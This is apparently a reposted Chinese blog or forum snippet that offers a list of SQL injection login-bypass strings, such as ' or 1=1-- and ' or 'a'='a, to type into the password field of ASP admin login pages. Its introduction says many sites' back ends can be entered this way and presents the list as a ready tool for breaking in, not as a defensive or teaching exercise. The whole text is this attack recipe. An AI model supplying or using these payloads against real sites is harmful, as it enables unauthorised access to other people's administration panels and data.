从AH那Y的BLOG上转来的。大家觉得很幼稚的东西
其实非常有用,不一定就是一个’or’=’or’就完美的。其实很多站都可以这样进后台的
Windows SQL injection (site contain /admin/login.asp or just login.asp page)
For user try what tha fuck U want..
Instead password use one of this string
’ or 1=1--
" or 1=1--
or 1=1--
’ or ’a’=’a
" or "a"="a
’) or (’a’=’a
") or ("a"="a |